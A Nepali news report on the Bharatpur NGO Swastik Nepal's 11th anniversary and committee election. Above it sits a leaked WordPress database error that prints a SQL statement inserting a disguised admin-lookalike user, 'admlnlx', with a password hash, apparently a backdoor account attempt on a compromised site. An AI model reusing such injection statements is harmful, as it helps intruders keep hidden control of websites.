WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDmuH4umEmUPauajAJJIznr7KvW4e.0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-11 11:18:40', '', 'admlnlx', 'admlnlx')
चितवन, फागुन ३–
सामाजिक क्षेत्रमा क्रियाशिल भरतपुरको गैरसरकारी संस्था स्वस्तिक नेपालले मंगलबार ११ औं स्थापना दिवस एवं छैठौं अधिवेशन सम्पन्न गरेको छ ।
संस्थापक अध्यक्ष हिरामान महर्जनको प्रमुख आतिथ्यतामा सम्पन्न सो अधिवेशनले बालकृष्ण कंडेलको अध्यक्षतामा ९ सदस्सीय नयां कार्यसमिती निर्विरोध चयन गरेको छ । जसको उपाध्यक्षमा राजन अधिकारी, महासचिवमा बासुदेव दवाडी, कोषाध्यक्षमा रामचन्द्र तिमिल्सेना, सचिवमा ईश्वरी पण्डित चयन हुनुभएको छ । यस्तै संस्थाको सदस्यहरुमा गोपाल भट्टराई, विष्णु लम्साल, नारायण कँडेल र अर्जुन अधिकारी रहनुभएको छ । संस्थाका अध्यक्ष महेन्द्रबहादुर कार्कीको अध्यक्षतामा सम्पन्न सो कार्यक्रममा महासचिव राजन अधिकारीले प्रगती प्रतिवेदन र कोषाध्यक्ष मदन घिमिरेले आर्थिक प्रतिवेदन प्रस्तुत गर्नुभएको थियो ।
कार्यक्रममा पूर्व अध्यक्षहरु सुदिपसिंह अधिकारी, गणेशप्रसाद पौडेल, सदस्यहरु सुमनकुमार श्रेष्ठ, उद्योग वाणिज्य संघ चितवनका अध्यक्ष तथा संस्थाका सदस्य राजन गौतम, डा.सुरेशकुमार प्रधान, गोपाल भट्टराईलगायतले संस्थाका कार्यक्रमबारे बोल्नुभएको थियो । २०६३ सालमा स्थापना भएको सो संस्थाले स्वास्थ्य तथा शिक्षाको क्षेत्रमा नेतृत्व, विकास लगायतका अभियानहरु संचालन गर्दै आएको छ ।